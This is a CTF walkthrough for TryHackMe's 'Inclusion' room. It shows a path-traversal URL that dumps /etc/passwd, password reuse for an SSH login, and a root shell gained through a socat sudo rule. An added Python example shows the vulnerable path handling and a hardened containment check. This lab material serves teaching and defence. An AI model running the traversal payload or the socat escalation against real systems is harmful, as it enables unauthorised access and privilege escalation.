TryHackMe: Inclusion writeup/walkthrough
Writeup/tutorial for the room ‘Inclusion’ on TryHackMe
Room Link | Easy difficulty
As per THM rules, write-ups shouldn’t include passwords/cracked hashes/flags. I can only help you find out how to get the answer, not give you the answer
Task 1: Deploy
Deploy the machine and in the meantime, connect to the THM network:
sudo openvpn --config <your_vpn_file>
Task 2: Root it!
#1. user flag and root flag
Since this is a room on Local File Inclusion, let’s look for other pages where we can change directories. Go to their website and look around.
There should be an LFI-attack section with a button to view it. Click on it and go to the page. If you check the URL, you will see something similar to this:
<Machine_IP>/article?name=lfiattack
We can exploit the name value here: it refers to a file called lfiattack, so we can point it at a different file instead, in this case /etc/passwd.
If we replace lfiattack in the URL with the following:
../../../../../../../etc/passwd
then we get the following URL:
<Machine_IP>/article?name=../../../../../../../etc/passwd
We now see the content of the /etc/passwd file being dumped on our webpage.
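Why the name parameter escapes the web root, and the check that would stop it, as an added example that is not the room's code. It assumes the server joins name onto an articles directory; ARTICLE_DIR, resolve_unsafe, resolve_safe and read_article are hypothetical names, and the sample article is constructed.

```python
import os
import tempfile

# Assumption: the handler reads <ARTICLE_DIR>/<name>; the room's real code is not shown on the page.
ARTICLE_DIR = tempfile.mkdtemp(prefix="articles_")  # constructed sample directory
with open(os.path.join(ARTICLE_DIR, "lfiattack"), "w") as fh:
    fh.write("constructed sample article")


def resolve_unsafe(name):
    """Vulnerable pattern: the parameter is joined onto the base directory unchecked."""
    return os.path.normpath(os.path.join(ARTICLE_DIR, name))


def resolve_safe(name):
    """Hardened pattern: canonicalise first, then require the result to stay inside the base."""
    base = os.path.realpath(ARTICLE_DIR)
    # realpath collapses ../ sequences and follows symlinks; an absolute name replaces base entirely
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base or not os.path.isfile(target):
        raise ValueError("rejected article name: %r" % name)
    return target


def read_article(name):
    """Read an article only after its path has passed the containment check."""
    with open(resolve_safe(name)) as fh:
        return fh.read()


if __name__ == "__main__":
    traversal = "../../../../../../../etc/passwd"  # the value used in the writeup
    print("unsafe resolves to:", resolve_unsafe(traversal))
    print("safe lookup:", read_article("lfiattack"))
    try:
        read_article(traversal)
    except ValueError as exc:
        print("safe lookup:", exc)
```

Checking containment after canonicalisation, rather than filtering for "../" in the string, also covers absolute paths and symlinks inside the articles directory.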
When you read through it, you’ll see that there is a user named falconfeast whose password is here. I took a guess from here and decided to try this on SSH on the default port and it worked!
ssh falconfeast@<Machine_IP>
<Enter falconfeast's password>
We can find the user flag in the current directory.
ls
cat user.txt
Now for the root flag. Let’s check if we can run anything with higher privileges.
sudo -l
# This reveals that we can run /usr/bin/socat with root privilege and to get the command that we will use to exploit socat, we can go to GTFOBins and search for socat there. The command to use to get higher privilege is:
sudo -u root /usr/bin/socat stdin exec:/bin/sh
id
# As the output of the id command shows, we are root! Now let's get the root flag.
cd /root
cat root.txt
That’s all for this room. Follow me for more write-ups!